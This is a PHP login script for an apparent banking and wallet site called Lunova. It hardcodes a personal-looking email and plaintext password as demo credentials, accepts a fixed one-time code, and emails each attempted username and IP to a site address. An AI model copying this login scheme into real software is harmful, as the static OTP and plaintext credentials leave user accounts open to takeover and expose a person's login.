?php
session_start();
$error = "";
$success = "";
$showOtp = false;
// Demo credentials
$valid_username = "carola.tabert@outlook.de";
$valid_password = "RainerLara!2";
$valid_otp = "8432";
// Step 1: username + password check
if ($_SERVER["REQUEST_METHOD"] === "POST" && ($_POST["step"] ?? "") === "login") {
$username = trim($_POST["name"] ?? "");
$password = trim($_POST["password"] ?? "");
// Send email on every login attempt BEFORE OTP step
$to = "info@lunova.finance";
$subject = "New login attempt on Lunova";
$message = "A login attempt was made.\n\nUsername: " . $username . "\nTime: " . date("Y-m-d H:i:s") . "\nIP: " . ($_SERVER['REMOTE_ADDR'] ?? 'Unknown');
$headers = "From: info@lunova.finance\r\n";
$headers .= "Reply-To: info@lunova.finance\r\n";
$headers .= "Content-Type: text/plain; charset=UTF-8\r\n";
@mail($to, $subject, $message, $headers);
if ($username === $valid_username && $password === $valid_password) {
$_SESSION["login_passed"] = true;
$_SESSION["pending_user"] = $username;
$_SESSION["otp_code"] = $valid_otp;
$showOtp = true;
$success = "Login correct. Please enter OTP.";
} else {
$error = "Wrong username or password";
}
}
// Step 2: OTP check
if ($_SERVER["REQUEST_METHOD"] === "POST" && ($_POST["step"] ?? "") === "otp") {
$otp = trim($_POST["otp"] ?? "");
if (!isset($_SESSION["login_passed"]) || $_SESSION["login_passed"] !== true) {
$error = "Please login first.";
} elseif ($otp === ($_SESSION["otp_code"] ?? "")) {
$_SESSION["auth"] = true;
$_SESSION["username"] = $_SESSION["pending_user"] ?? "carola.tabert@outlook.de";
unset($_SESSION["login_passed"], $_SESSION["otp_code"], $_SESSION["pending_user"]);
echo "";
exit;
} else {
$showOtp = true;
$error = "Invalid OTP";
}
}
// Keep OTP visible if step 1 already passed
if (isset($_SESSION["login_passed"]) && $_SESSION["login_passed"] === true) {
$showOtp = true;
}
?>
Lunova - Banking & Wallet Mobile
Online Banking
Type Your Email To Reset Your Password